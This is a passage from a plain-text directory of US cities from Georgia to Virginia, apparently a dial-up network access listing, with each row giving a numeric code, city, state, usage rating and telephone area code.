+433   Martinez             GA  USA  LOW   B B  C         404      Y
+8795  Norcross/Doraville   GA  USA  HIGH  B B  C         404      Y
+8795  Norcross/Doraville   GA  USA  HIGH  B B  C         404      Y
+8795  Norcross/Doraville   GA  USA  HIGH  B B  C         404      Y
+1386  Rome                 GA  USA  LOW   B B  C         404      Y
+3327  Savannah             GA  USA  LOW   B B  C         912      Y
+3711  Warner Robins        GA  USA  LOW   B B  C         912      Y
+1745  Ames                 IA  USA  LOW   B B  C         515      Y
+5964  Cedar Falls/Waterloo IA  USA  LOW   B B  C         319      Y
+8755  Cedar Rapids         IA  USA  LOW   B B  C         319      Y
+5296  Davenport/RockIsland IA  USA  MED   B B  C         309      Y
+9854  Des Moines           IA  USA  MED   B B  C         515      Y
+3275  Dubuque              IA  USA  LOW   B B  C         319      Y
+5290  Iowa City            IA  USA  LOW   B B  C         319      Y
+5374  Marshalltown         IA  USA  LOW   B B  C         515      Y
+08985 Ottomwa              IA  USA  LOW   B B  C         515      Y
+14315 Sioux City           IA  USA  LOW   B B  C         712      Y
+5964  Waterloo             IA  USA  LOW   B B  C         319      Y
+200   Boise                ID  USA  MED   B B  C         208      Y
+10239 Coeur D'Alene        ID  USA  LOW   B B  C         208      Y
+3660  Idaho Falls          ID  USA  LOW   B B  C         208      Y
+3207  Pocatello            ID  USA  LOW   B B  C         208      Y
+1436  Twin Falls           ID  USA  LOW   B B  C         208      Y
+11496 Bloomington          IL  USA  LOW   B B  C         309      Y
+13595 Bradley              IL  USA  LOW   B B  C         815      Y
+9753  Champaign/Urbana     IL  USA  LOW   B B  C         217      Y
+8257  Chicago              IL  USA  HIGH  B B  C         312      Y
+8257  Chicago              IL  USA  HIGH  B B  C         312      Y
+4630  Cicero/Maywood       IL  USA  LOW   B B  C         708      Y
+1119  Danville             IL  USA  LOW   B B  C         217      Y
+8900  Decatur              IL  USA  LOW   B B  C         217      Y
+8944  Downrs Grove/Gln Eln IL  USA  MED   B B  C         708      Y
+8944  Downrs Grove/Gln Eln IL  USA  MED   B B  C         708      Y
+3905  Elgin                IL  USA  LOW   B B  C         708      Y
+4630  Forest Park/Maywood  IL  USA  LOW   B B  C         708      Y
+2514  Freeport             IL  USA  LOW   B B  C         815      Y
+8944  Glen Ellyn           IL  USA  MED   B B  C         708      Y
+8944  Glen Ellyn           IL  USA  MED   B B  C         708      Y
+14576 Joliet               IL  USA  LOW   B B  C         815      Y
+13595 Kankakee/Bradley     IL  USA  LOW   B B  C         815      Y
+780   Lake Bluff           IL  USA  LOW   B B  C         708      Y
+7005  Lake Zurich/Palatine IL  USA  LOW   B B  C         708      Y
+13640 Lansing              IL  USA  LOW   B B  C         708      Y
+780   Librtyvle/Lake Bluff IL  USA  LOW   B B  C         708      Y
+4630  Maywood              IL  USA  LOW   B B  C         708      Y
+10945 Northfield           IL  USA  LOW   B B  C         708      Y
+3001  O'Fallon             IL  USA  LOW   B B  C         618      Y
+7005  Palatine             IL  USA  LOW   B B  C         708      Y
+3614  Peoria               IL  USA  LOW   B B  C         309      Y
+14553 Quincy               IL  USA  LOW   B B  C         217      Y
+5296  Rock Island          IL  USA  MED   B B  C         309      Y
+6048  Rockford             IL  USA  MED   B B  C         815      Y
+5403  Springfield          IL  USA  MED   B B  C         217      Y
+9753  Urbana               IL  USA  LOW   B B  C         217      Y
+8944  Wheaton/Glen Ellyn   IL  USA  MED   B B  C         708      Y
+8944  Wheaton/Glen Ellyn   IL  USA  MED   B B  C         708      Y
+9323  Bloomington          IN  USA  LOW   B B  C         812      Y
+2444  Elkhart              IN  USA  LOW   B B  C         219      Y
+3426  Evansville           IN  USA  LOW   B B  C         812      Y
+3423  Ft. Wayne            IN  USA  LOW   B B  C         219      Y
+14286 Gary                 IN  USA  LOW   B B  C         219      Y
+14286 Gary                 IN  USA  LOW   B B  C         219      Y
+14286 Hammond/Gary         IN  USA  LOW   B B  C         219      Y
+14286 Hammond/Gary         IN  USA  LOW   B B  C         219      Y
+14286 Highland/Gary        IN  USA  LOW   B B  C         219      Y
+14286 Highland/Gary        IN  USA  LOW   B B  C         219      Y
+9349  Indianapolis         IN  USA  HIGH  B B  C         317      Y
+2646  Kokomo               IN  USA  LOW   B B  C         317      Y
+3157  Lafayette            IN  USA  LOW   B B  C         317      Y
+4632  Marion               IN  USA  LOW   B B  C         317      Y
+5129  Mishawaka/South Bend IN  USA  MED   B B  C         219      Y
+5129  South Bend           IN  USA  MED   B B  C         219      Y
+2893  Terre Haute          IN  USA  LOW   B B  C         812      Y
+8615  Kansas City/Mission  KS  USA  HIGH  B B  C         913      Y
+8615  Kansas City/Mission  KS  USA  HIGH  B B  C         913      Y
+14347 Lawrence             KS  USA  LOW   B B  C         913      Y
+3408  Leavenworth          KS  USA  LOW   B B  C         913      Y
+2799  Manhattan            KS  USA  LOW   B B  C         913      Y
+8615  Mission              KS  USA  HIGH  B B  C         913      Y
+8615  Mission              KS  USA  HIGH  B B  C         913      Y
+3416  Salina               KS  USA  LOW   B B  C         913      Y
+8615  Shawnee/Mission      KS  USA  HIGH  B B  C         913      Y
+8615  Shawnee/Mission      KS  USA  HIGH  B B  C         913      Y
+1672  Topeka               KS  USA  LOW   B B  C         913      Y
+8013  Wichita              KS  USA  MED   B B  C         316      Y
+16213 Bowling Green        KY  USA  LOW   B B  C         502      Y
+3718  Frankfort            KY  USA  LOW   B B  C         502      Y
+9987  Lexington            KY  USA  MED   B B  C         606      Y
+8678  Louisville           KY  USA  MED   B B  C         502      Y
+1087  Owensboro            KY  USA  LOW   B B  C         502      Y
+02291 Paducah              KY  USA  LOW   B B  C         502      Y
+14288 Alexandria           LA  USA  LOW   B B  C         318      Y
+6999  Baton Rouge          LA  USA  MED   B B  C         504      Y
+6999  Baton Rouge          LA  USA  MED   B B  C         504      Y
+8525  Lafayette            LA  USA  LOW   B B  C         318      Y
+15174 Lake Charles         LA  USA  LOW   B B  C         318      Y
+2480  Monroe               LA  USA  LOW   B B  C         318      Y
+3654  New Orleans          LA  USA  HIGH  B B  C         504      Y
+03654 New Orleans          LA  USA  HIGH  B B  C         504      Y
+03654 New Orleans          LA  USA  HIGH  B B  C         504      Y
+3539  Shreveport           LA  USA  LOW   B B  C         318      Y
+10404 Slidell              LA  USA  LOW   B B  C         504      Y
+7044  Bedford              MA  USA  LOW   B B  C         617      Y
+8796  Boston               MA  USA  HIGH  B B  C         617      Y
+8796  Boston               MA  USA  HIGH  B B  C         617      Y
+753   Brockton/Randolph    MA  USA  LOW   B B  C         617      Y
+8796  Cambridge/Boston     MA  USA  HIGH  B B  C         617      Y
+8796  Cambridge/Boston     MA  USA  HIGH  B B  C         617      Y
+3003  Fall River/Somerset  MA  USA  LOW   B B  C         508      Y
+10677 Fitchburg/Leominster MA  USA  LOW   B B  C         508      Y
+10148 Groton               MA  USA  LOW   B B  C         508      Y
+3948  Holyoke/Springfield  MA  USA  MED   B B  C         413      Y
+3948  Holyoke/Springfield  MA  USA  MED   B B  C         413      Y
+3948  Holyoke/Springfield  MA  USA  MED   B B  C         413      Y
+11063 Kingston             MA  USA  LOW   B B  C         617      Y
+10020 Lawrence             MA  USA  LOW   B B  C         508      Y
+10677 Leominster           MA  USA  LOW   B B  C         508      Y
+531   Lowell               MA  USA  LOW   B B  C         508      Y
+07745 Lynn                 MA  USA  LOW   B B  C         617      Y
+4001  Manchester           MA  USA  LOW   B B  C         508      Y
+432   Marlborough          MA  USA  LOW   B B  C         508      Y
+4216  New Bedford          MA  USA  LOW   B B  C         508      Y
+2478  Pittsfield           MA  USA  LOW   B B  C         413      Y
+753   Randolph             MA  USA  LOW   B B  C         617      Y
+3003  Somerset             MA  USA  LOW   B B  C         508      Y
+3948  Springfield          MA  USA  MED   B B  C         413      Y
+3948  Springfield          MA  USA  MED   B B  C         413      Y
+3948  Springfield          MA  USA  MED   B B  C         413      Y
+11108 Taunton              MA  USA  LOW   B B  C         508      Y
+7044  Woburn/Bedford       MA  USA  LOW   B B  C         617      Y
+3456  Worcester            MA  USA  LOW   B B  C         508      Y
+14437 Aberdeen             MD  USA  LOW   B B  C         410      Y
+10587 Annapolis            MD  USA  LOW   B B  C         410      Y
+4600  Baltimore            MD  USA  HIGH  B B  C         410      Y
+4600  Baltimore            MD  USA  HIGH  B B  C         410      Y
+2262  Bethesda/Fairfax     MD  USA  HIGH  B B  C         703      Y
+2262  Bethesda/Fairfax     MD  USA  HIGH  B B  C         703      Y
+2262  Bethesda/Fairfax     MD  USA  HIGH  B B  C         703      Y
+2262  Bethesda/Fairfax     MD  USA  HIGH  B B  C         703      Y
+2262  Bethesda/Fairfax     MD  USA  HIGH  B B  C         703      Y
+999   Cumberland           MD  USA  LOW   B B  C         301      Y
+10832 Frederick/Myersville MD  USA  LOW   B B  C         301      Y
+10832 Hagerstown/Myersvill MD  USA  LOW   B B  C         301      Y
+10832 Myersville           MD  USA  LOW   B B  C         301      Y
+1758  Rockville            MD  USA  LOW   B B  C         301      Y
+10209 Salisbury            MD  USA  LOW   B B  C         410      Y
+9686  Auburn               ME  USA  LOW   B B  C         207      Y
+7486  Augusta              ME  USA  LOW   B B  C         207      Y
+10860 Bangor               ME  USA  LOW   B B  C         207      Y
+9686  Lewiston/Auburn      ME  USA  LOW   B B  C         207      Y
+4217  Portland             ME  USA  LOW   B B  C         207      Y
+07252 Presque Isle         ME  USA  LOW   B B  C         207      Y
+6438  Ann Arbor            MI  USA  MED   B B  C         313      Y
+10147 Battle Creek         MI  USA  LOW   B B  C         616      Y
+4231  Benton Harbor        MI  USA  LOW   B B  C         616      Y
+894   Burton               MI  USA  LOW   B B  C         313      Y
+4316  Cadillac             MI  USA  LOW   B B  C         616      Y
+8794  Detroit              MI  USA  HIGH  B B  C         313      Y
+8794  Detroit              MI  USA  HIGH  B B  C         313      Y
+894   Flint/Burton         MI  USA  LOW   B B  C         313      Y
+4766  Freeland             MI  USA  LOW   B B  C         517      Y
+4017  Grand Rapids         MI  USA  MED   B B  C         616      Y
+5747  Jackson              MI  USA  LOW   B B  C         517      Y
+3195  Kalamazoo            MI  USA  MED   B B  C         616      Y
+9992  Lansing              MI  USA  MED   B B  C         517      Y
+7225  Marquette            MI  USA  LOW   B B  C         906      Y
+4766  Midland/Freeland     MI  USA  LOW   B B  C         517      Y
+4357  Muskegon             MI  USA  LOW   B B  C         616      Y
+4847  Plymouth             MI  USA  MED   B B  C         313      Y
+10342 Pontiac              MI  USA  LOW   B B  C         313      Y
+4620  Port Huron           MI  USA  LOW   B B  C         313      Y
+10754 Roseville            MI  USA  LOW   B B  C         313      Y
+4766  Saginaw/Freeland     MI  USA  LOW   B B  C         517      Y
+3424  Southfield           MI  USA  MED   B B  C         313      Y
+4231  St. Joe/Benton Hrbr  MI  USA  LOW   B B  C         616      Y
+6066  Traverse City        MI  USA  LOW   B B  C         616      Y
+10933 Duluth               MN  USA  LOW   B B  C         218      Y
+13488 Hibbing              MN  USA  LOW   B B  C         218      Y
+1648  Mankato              MN  USA  LOW   B B  C         507      Y
+3494  Minneapolis          MN  USA  HIGH  B B  C         612      Y
+3494  Minneapolis          MN  USA  HIGH  B B  C         612      Y
+10597 Rochester            MN  USA  LOW   B B  C         507      Y
+10597 Rochester            MN  USA  LOW   B B  C         507      Y
+14283 St. Cloud            MN  USA  LOW   B B  C         612      Y
+3494  St. Paul/Minneapolis MN  USA  HIGH  B B  C         612      Y
+3494  St. Paul/Minneapolis MN  USA  HIGH  B B  C         612      Y
+8978  Bridgeton/St. Louis  MO  USA  HIGH  B B  C         314      Y
+8978  Bridgeton/St. Louis  MO  USA  HIGH  B B  C         314      Y
+8856  Cape Girardeau       MO  USA  LOW   B B  C         314      Y
+6017  Columbia             MO  USA  LOW   B B  C         314      Y
+8978  Hazelwood            MO  USA  HIGH  B B  C         314      Y
+8615  Independence/Mission MO  USA  HIGH  B B  C         913      Y
+8615  Independence/Mission MO  USA  HIGH  B B  C         913      Y
+2564  Jefferson City       MO  USA  LOW   B B  C         314      Y
+1928  Joplin               MO  USA  LOW   B B  C         417      Y
+8615  Kansas City/Mission  MO  USA  HIGH  B B  C         913      Y
+8615  Kansas City/Mission  MO  USA  HIGH  B B  C         913      Y
+6182  Rolla                MO  USA  LOW   B B  C         314      Y
+5681  Springfield          MO  USA  LOW   B B  C         417      Y
+6192  St. Joseph           MO  USA  LOW   B B  C         816      Y
+8978  St. Louis            MO  USA  HIGH  B B  C         314      Y
+8978  St. Louis            MO  USA  HIGH  B B  C         314      Y
+14342 Gulfport             MS  USA  LOW   B B  C         601      Y
+1164  Hattiesburg          MS  USA  LOW   B B  C         601      Y
+6301  Jackson              MS  USA  LOW   B B  C         601      Y
+6301  Jackson              MS  USA  LOW   B B  C         601      Y
+6491  Meridian             MS  USA  LOW   B B  C         601      Y
+14882 Pascagoula           MS  USA  LOW   B B  C         601      Y
+9901  Tupelo               MS  USA  LOW   B B  C         601      Y
+10874 Vicksburg            MS  USA  LOW   B B  C         601      Y
+3504  Billings             MT  USA  LOW   B B  C         406      Y
+7946  Bozeman              MT  USA  LOW   B B  C         406      Y
+7862  Butte                MT  USA  LOW   B B  C         406      Y
+04506 Great Falls          MT  USA  LOW   B B  C         406      Y
+5136  Helena               MT  USA  LOW   B B  C         406      Y
+274   Asheville            NC  USA  LOW   B B  C         704      Y
+9986  Chapel Hill/Durham   NC  USA  HIGH  B B  C         919      Y
+9986  Chapel Hill/Durham   NC  USA  HIGH  B B  C         919      Y
+6793  Charlotte            NC  USA  HIGH  B B  C         704      Y
+6793  Charlotte            NC  USA  HIGH  B B  C         704      Y
+9986  Durham               NC  USA  HIGH  B B  C         919      Y
+9986  Durham               NC  USA  HIGH  B B  C         919      Y
+10985 Fayetteville         NC  USA  LOW   B B  C         919      Y
+3703  Gastonia             NC  USA  LOW   B B  C         704      Y
+2964  Greensboro           NC  USA  MED   B B  C         919      Y
+2004  Greenville           NC  USA  LOW   B B  C         919      Y
+1737  High Point           NC  USA  LOW   B B  C         919      Y
+7821  Kannapolis           NC  USA  LOW   B B  C         704      Y
+9324  Rocky Mount          NC  USA  LOW   B B  C         919      Y
+14364 Wilmington           NC  USA  LOW   B B  C         919      Y
+7068  Winston-Salem        NC  USA  MED   B B  C         919      Y
+7068  Winston-Salem        NC  USA  MED   B B  C         919      Y
+14444 Bismark              ND  USA  LOW   B B  C         701      Y
+5251  Fargo                ND  USA  LOW   B B  C         701      Y
+7233  Grand Forks          ND  USA  LOW   B B  C         701      Y
+4281  Minot                ND  USA  LOW   B B  C         701      Y
+14994 Minot                ND  USA  LOW   B B  C         701      Y
+6997  Grand Island         NE  USA  LOW   B B  C         308      Y
+9856  Lincoln              NE  USA  LOW   B B  C         402      Y
+2521  Omaha                NE  USA  MED   B B  C         402      Y
+7212  Concord              NH  USA  LOW   B B  C         603      Y
+6651  Durham               NH  USA  LOW   B B  C         603      Y
+3627  Hanover              NH  USA  LOW   B B  C         603      Y
+4027  Manchester           NH  USA  LOW   B B  C         603      Y
+1347  Nashua               NH  USA  MED   B B  C         603      Y
+1696  North Hampton        NH  USA  LOW   B B  C         603      Y
+1554  Peterborough         NH  USA  LOW   B B  C         603      Y
+1347  Salem/Nashua         NH  USA  MED   B B  C         603      Y
+883   Atlantic City        NJ  USA  LOW   B B  C         609      Y
+8693  Camden/Pennsauken    NJ  USA  MED   B B  C         609      Y
+8693  Cherry hill/Pennskn  NJ  USA  MED   B B  C         609      Y
+6334  Eatontown/Red Bank   NJ  USA  LOW   B B  C         908      Y
+6334  Eatontown/Red Bank   NJ  USA  LOW   B B  C         908      Y
+7618  Elizabeth/Newark     NJ  USA  HIGH  B B  C         201      Y
+7618  Elizabeth/Newark     NJ  USA  HIGH  B B  C         201      Y
+6319  Englewood Cliffs     NJ  USA  MED   B B  C         201      Y
+7618  Jersey City/Newark   NJ  USA  HIGH  B B  C         201      Y
+7618  Jersey City/Newark   NJ  USA  HIGH  B B  C         201      Y
+6334  Long Branch/Red Bank NJ  USA  LOW   B B  C         908      Y
+6334  Long Branch/Red Bank NJ  USA  LOW   B B  C         908      Y
+4378  Lyndhurst/Union City NJ  USA  HIGH  B B  C         201      Y
+3820  Morristown           NJ  USA  LOW   B B  C         201      Y
+7618  Newark               NJ  USA  HIGH  B B  C         201      Y
+7618  Newark               NJ  USA  HIGH  B B  C         201      Y
+2312  Paterson             NJ  USA  MED   B B  C         201      Y
+8693  Pennsauken           NJ  USA  MED   B B  C         609      Y
+3319  Piscataway           NJ  USA  HIGH  B B  C         908      Y
+6334  Red Bank             NJ  USA  LOW   B B  C         908      Y
+2312  Ridgewood/Paterson   NJ  USA  MED   B B  C         201      Y
+8920  South Brunswick      NJ  USA  HIGH  B B  C         609      Y
+730   Trenton              NJ  USA  LOW   B B  C         609      Y
+4378  Union City           NJ  USA  HIGH  B B  C         201      Y
+7618  Union/Newark         NJ  USA  HIGH  B B  C         201      Y
+7618  Union/Newark         NJ  USA  HIGH  B B  C         201      Y
+14708 Vineland             NJ  USA  LOW   B B  C         609      Y
+2312  Wayne/Paterson       NJ  USA  MED   B B  C         201      Y
+661   Albuquerque          NM  USA  MED   B B  C         505      Y
+6630  Las Cruces           NM  USA  LOW   B B  C         505      Y
+14541 Rosewell             NM  USA  LOW   B B  C         505      Y
+4604  Santa Fe             NM  USA  LOW   B B  C         505      Y
+2140  Carson City          NV  USA  MED   B B  C         702      Y
+2140  Carson City          NV  USA  MED   B B  C         702      Y
+13943 Las Vegas            NV  USA  MED   B B  C         702      Y
+13943 Las Vegas            NV  USA  MED   B B  C         702      Y
+2140  Reno/Carson City     NV  USA  MED   B B  C         702      Y
+2140  Reno/Carson City     NV  USA  MED   B B  C         702      Y
+9192  Albany               NY  USA  MED   B B  C         518      Y
+5312  Binghampton          NY  USA  LOW   B B  C         607      Y
+9194  Buffalo              NY  USA  MED   B B  C         716      Y
+582   Centereach/Lk Grove  NY  USA  MED   B B  C         516      Y
+6612  Corning              NY  USA  LOW   B B  C         607      Y
+15117 Elmira               NY  USA  LOW   B B  C         607      Y
+09193 Hempstead            NY  USA  MED   B B  C         516      Y
+9193  Hempstead            NY  USA  MED   B B  C         516      Y
+8811  Huntington/Melville  NY  USA  MED   B B  C         516      Y
+11191 Ithaca               NY  USA  LOW   B B  C         607      Y
+8861  Kingston             NY  USA  LOW   B B  C         914      Y
+582   Lake Grove           NY  USA  MED   B B  C         516      Y
+8811  Melville             NY  USA  MED   B B  C         516      Y
+9193  Mineola/Hempstead    NY  USA  MED   B B  C         516      Y
+9193  Mineola/Hempstead    NY  USA  MED   B B  C         516      Y
+10615 New City             NY  USA  LOW   B B  C         914      Y
+1059  New York             NY  USA  HIGH  B B  C         212      Y
+1059  New York             NY  USA  HIGH  B B  C         212      Y
+1059  New York             NY  USA  HIGH  B B  C         212      Y
+1059  New York             NY  USA  HIGH  B B  C         212      Y
+3480  Niagara Falls        NY  USA  LOW   B B  C         716      Y
+6019  Perinton/Pittsford   NY  USA  HIGH  B B  C         716      Y
+6019  Pittsford            NY  USA  HIGH  B B  C         716      Y
+2930  Poughkeepsie         NY  USA  LOW   B B  C         914      Y
+6019  Rochester/Pittsford  NY  USA  HIGH  B B  C         716      Y
+582   Ronkonkoma/Lake Grve NY  USA  MED   B B  C         516      Y
+9192  Schenectady/Albany   NY  USA  MED   B B  C         518      Y
+4710  Syracuse             NY  USA  MED   B B  C         315      Y
+1101  Utica                NY  USA  LOW   B B  C         315      Y
+08109 Watertown            NY  USA  LOW   B B  C         315      Y
+8571  White Plains         NY  USA  HIGH  B B  C         914      Y
+8571  White Plains         NY  USA  HIGH  B B  C         914      Y
+8740  Akron                OH  USA  MED   B B  C         216      Y
+8740  Akron                OH  USA  MED   B B  C         216      Y
+8160  Canton               OH  USA  LOW   B B  C         216      Y
+1785  Cincinnati           OH  USA  HIGH  B B  C         513      Y
+1785  Cincinnati           OH  USA  HIGH  B B  C         513      Y
+4222  Cleveland            OH  USA  HIGH  B B  C         216      Y
+4222  Cleveland            OH  USA  HIGH  B B  C         216      Y
+9347  Columbus             OH  USA  HIGH  B B  C         614      Y
+9511  Dayton               OH  USA  MED   B B  C         513      Y
+8859  Elyria               OH  USA  LOW   B B  C         216      Y
+1427  Findly               OH  USA  LOW   B B  C         419      Y
+4622  Lima                 OH  USA  LOW   B B  C         419      Y
+6022  Mansfield            OH  USA  LOW   B B  C         419      Y
+13471 Springfield          OH  USA  LOW   B B  C         513      Y
+7313  Steubenville/Wntsvl  OH  USA  LOW   B B  C         614      Y
+1190  Toledo               OH  USA  MED   B B  C         419      Y
+1190  Toledo               OH  USA  MED   B B  C         419      Y
+11131 Warren               OH  USA  LOW   B B  C         216      Y
+7313  Wintersville         OH  USA  LOW   B B  C         614      Y
+4909  Youngstown           OH  USA  LOW   B B  C         216      Y
+7231  Ardmore              OK  USA  LOW   B B  C         405      Y
+10816 Enid                 OK  USA  LOW   B B  C         405      Y
+16218 Lawton               OK  USA  LOW   B B  C         405      Y
+9165  Oklahoma City        OK  USA  HIGH  B B  C         405      Y
+6605  Tulsa                OK  USA  HIGH  B B  C         918      Y
+06605 Tulsa                OK  USA  HIGH  B B  C         918      Y
+2820  Bend                 OR  USA  LOW   B B  C         503      Y
+8603  Corvallis            OR  USA  LOW   B B  C         503      Y
+9857  Eugene               OR  USA  LOW   B B  C         503      Y
+7883  Medford              OR  USA  LOW   B B  C         503      Y
+9164  Portland             OR  USA  HIGH  B B  C         503      Y
+9164  Portland             OR  USA  HIGH  B B  C         503      Y
+3174  Salem                OR  USA  LOW   B B  C         503      Y
+9857  Springfield/Eugene   OR  USA  LOW   B B  C         503      Y
+3432  Allentown/Bethlehem  PA  USA  MED   B B  C         215      Y
+7025  Altoona              PA  USA  LOW   B B  C         814      Y
+3432  Bethlehem            PA  USA  MED   B B  C         215      Y
+3896  Butler               PA  USA  LOW   B B  C         412      Y
+182   Coatesville          PA  USA  LOW   B B  C         215      Y
+182   Downington/Coatsvlle PA  USA  LOW   B B  C         215      Y
+3338  Erie                 PA  USA  LOW   B B  C         814      Y
+13069 Greensburg           PA  USA  LOW   B B  C         412      Y
+1707  Harrisburg/Lemoyne   PA  USA  MED   B B  C         717      Y
+8376  Johnstown            PA  USA  LOW   B B  C         814      Y
+508   KingofPrussa/Norstwn PA  USA  MED   B B  C         215      Y
+7853  Lancaster            PA  USA  LOW   B B  C         717      Y
+13069 Latrobe/Greensburg   PA  USA  LOW   B B  C         412      Y
+1707  Lemoyne              PA  USA  MED   B B  C         717      Y
+14610 Mt. Penn             PA  USA  LOW   B B  C         215      Y
+7851  New Castle           PA  USA  LOW   B B  C         412      Y
+508   Norristown           PA  USA  MED   B B  C         215      Y
+9581  Philadelphia         PA  USA  HIGH  B B  C         215      Y
+9581  Philadelphia         PA  USA  HIGH  B B  C         215      Y
+9581  Philadelphia         PA  USA  HIGH  B B  C         215      Y
+7408  Pittsburgh           PA  USA  HIGH  B B  C         412      Y
+1572  Scranton             PA  USA  LOW   B B  C         717      Y
+8907  Secane               PA  USA  LOW   B B  C         215      Y
+3765  State College        PA  USA  LOW   B B  C         814      Y
+508   Valley Forge/Norstwn PA  USA  MED   B B  C         215      Y
+7941  Wilkes Barre         PA  USA  LOW   B B  C         717      Y
+11157 Williamsport         PA  USA  LOW   B B  C         717      Y
+4382  York                 PA  USA  LOW   B B  C         717      Y
+6425  Middletown           RI  USA  LOW   B B  C         401      Y
+6425  Newport/Middletown   RI  USA  LOW   B B  C         401      Y
+9130  Pawtucket/Providence RI  USA  HIGH  B B  C         401      Y
+9130  Pawtucket/Providence RI  USA  HIGH  B B  C         401      Y
+9130  Providence           RI  USA  HIGH  B B  C         401      Y
+9130  Providence           RI  USA  HIGH  B B  C         401      Y
+9130  Warwick/Providence   RI  USA  HIGH  B B  C         401      Y
+9130  Warwick/Providence   RI  USA  HIGH  B B  C         401      Y
+11293 Woonsocket           RI  USA  LOW   B B  C         401      Y
+2917  Aiken                SC  USA  LOW   B B  C         803      Y
+9907  Charleston           SC  USA  LOW   B B  C         803      Y
+9993  Columbia             SC  USA  MED   B B  C         803      Y
+9993  Columbia             SC  USA  MED   B B  C         803      Y
+9993  Columbia             SC  USA  MED   B B  C         803      Y
+8860  Florence             SC  USA  LOW   B B  C         803      Y
+3380  Greenville           SC  USA  MED   B B  C         803      Y
+3380  Greenville           SC  USA  MED   B B  C         803      Y
+935   Myrtle Beach         SC  USA  LOW   B B  C         803      Y
+14407 Spartanburg          SC  USA  LOW   B B  C         803      Y
+8872  Pierre               SD  USA  LOW   B B  C         605      Y
+2171  Rapid City           SD  USA  LOW   B B  C         605      Y
+8819  Sioux Falls          SD  USA  LOW   B B  C         605      Y
+1836  Blountville          TN  USA  LOW   B B  C         615      Y
+2937  Chattanooga          TN  USA  MED   B B  C         615      Y
+5720  Clarkesville         TN  USA  LOW   B B  C         615      Y
+3175  Jackson              TN  USA  LOW   B B  C         901      Y
+8502  Johnson City         TN  USA  LOW   B B  C         615      Y
+8328  Kingsport            TN  USA  LOW   B B  C         615      Y
+13895 Knoxville            TN  USA  MED   B B  C         615      Y
+13895 Knoxville            TN  USA  MED   B B  C         615      Y
+1551  Memphis              TN  USA  MED   B B  C         901      Y
+1551  Memphis              TN  USA  MED   B B  C         901      Y
+9141  Nashville            TN  USA  HIGH  B B  C         615      Y
+9141  Nashville            TN  USA  HIGH  B B  C         615      Y
+9141  Nashville            TN  USA  HIGH  B B  C         615      Y
+9683  Oakridge             TN  USA  LOW   B B  C         615      Y
+9114  Sevierville          TN  USA  LOW   B B  C         615      Y
+6980  Abilene              TX  USA  LOW   B B  C         915      Y
+8736  Amarillo             TX  USA  LOW   B B  C         806      Y
+9337  Arlington/Fort Worth TX  USA  MED   B B  C         817      Y
+1306  Austin               TX  USA  HIGH  B B  C         512      Y
+1306  Austin               TX  USA  HIGH  B B  C         512      Y
+1306  Austin               TX  USA  HIGH  B B  C         512      Y
+7758  Baytown              TX  USA  LOW   B B  C         713      Y
+5115  Brownsville          TX  USA  LOW   B B  C         512      Y
+14871 Bryan                TX  USA  LOW   B B  C         409      Y
+4497  College Statn/Bryan  TX  USA  LOW   B B  C         409      Y
+11966 Corpus Christi       TX  USA  MED   B B  C         512      Y
+2948  Dallas               TX  USA  HIGH  B B  C         214      Y
+2948  Dallas               TX  USA  HIGH  B B  C         214      Y
+2948  Dallas               TX  USA  HIGH  B B  C         214      Y
+5990  Denton               TX  USA  LOW   B B  C         817      Y
+210   El Paso              TX  USA  MED   B B  C         915      Y
+210   El Paso              TX  USA  MED   B B  C         915      Y
+9337  Fort Worth           TX  USA  MED   B B  C         817      Y
+3615  Galveston            TX  USA  LOW   B B  C         409      Y
+13481 Harlingen            TX  USA  LOW   B B  C         512      Y
+4562  Houston              TX  USA  HIGH  B B  C         713      Y
+4562  Houston              TX  USA  HIGH  B B  C         713      Y
+4562  Houston              TX  USA  HIGH  B B  C         713      Y
+4562  Houston              TX  USA  HIGH  B B  C         713      Y
+4562  Houston              TX  USA  HIGH  B B  C         713      Y
+9861  Killeen              TX  USA  LOW   B B  C         817      Y
+3715  Laredo               TX  USA  LOW   B B  C         512      Y
+948   Longview             TX  USA  LOW   B B  C         903      Y
+4435  Lubbock              TX  USA  LOW   B B  C         806      Y
+12022 Mcallen              TX  USA  LOW   B B  C         512      Y
+8254  McKinney             TX  USA  LOW   B B  C         214      Y
+04905 Midland              TX  USA  LOW   B B  C         915      Y
+9322  Nederland/Pt. Arthur TX  USA  LOW   B B  C         409      Y
+2326  Odessa/Midland       TX  USA  LOW   B B  C         915      Y
+9322  Port Arthur          TX  USA  LOW   B B  C         409      Y
+8511  San Angelo           TX  USA  LOW   B B  C         915      Y
+9169  San Antonio          TX  USA  HIGH  B B  C         512      Y
+09169 San Antonio          TX  USA  HIGH  B B  C         512      Y
+9169  San Antonio          TX  USA  HIGH  B B  C         512      Y
+6248  Sherman              TX  USA  LOW   B B  C         903      Y
+14777 Temple               TX  USA  LOW   B B  C         817      Y
+8871  Texarkana            TX  USA  LOW   B B  C         903      Y
+3615  Texas City/Galveston TX  USA  LOW   B B  C         409      Y
+3826  Tyler                TX  USA  LOW   B B  C         903      Y
+10996 Victoria             TX  USA  LOW   B B  C         512      Y
+9859  Waco                 TX  USA  LOW   B B  C         817      Y
+6862  Wichita Falls        TX  USA  LOW   B B  C         817      Y
+07936 Ogden                UT  USA  LOW   B B  C         801      Y
+534   Salt Lake City       UT  USA  HIGH  B B  C         801      Y
+534   Salt Lake City       UT  USA  HIGH  B B  C         801      Y
+2262  Alexandria/Fairfax   VA  USA  HIGH  B B  C         703      Y
+2262  Alexandria/Fairfax   VA  USA  HIGH  B B  C         703      Y
+2262  Alexandria/Fairfax   VA  USA  HIGH  B B  C         703      Y
+2262  Alexandria/Fairfax   VA  USA  HIGH  B B  C         703      Y
+2262  Alexandria/Fairfax   VA  USA  HIGH  B B  C         703      Y
+2262  Arlington/Fairfax    VA  USA  HIGH  B B  C         703      Y
+2262  Arlington/Fairfax    VA  USA  HIGH  B B  C         703      Y
+2262  Arlington/Fairfax    VA  USA  HIGH  B B  C         703      Y
+2262  Arlington/Fairfax    VA  USA  HIGH  B B  C         703      Y
+2262  Arlington/Fairfax    VA  USA  HIGH  B B  C         703      Y
+8531  Charlottesville      VA  USA  LOW   B B  C         804      Y
+2262  Fairfax              VA  USA  HIGH  B B  C         703      Y
+2262  Fairfax              VA  USA  HIGH  B B  C         703      Y
+2262  Fairfax              VA  USA  HIGH  B B  C         703      Y
+2262  Fairfax              VA  USA  HIGH  B B  C         703      Y
+2262  Fairfax              VA  USA  HIGH  B B  C         703      Y
+8215  Hampton              VA  USA  MED   B B  C         804      Y
+10149 Harrisonburg         VA  USA  LOW   B B  C         703      Y
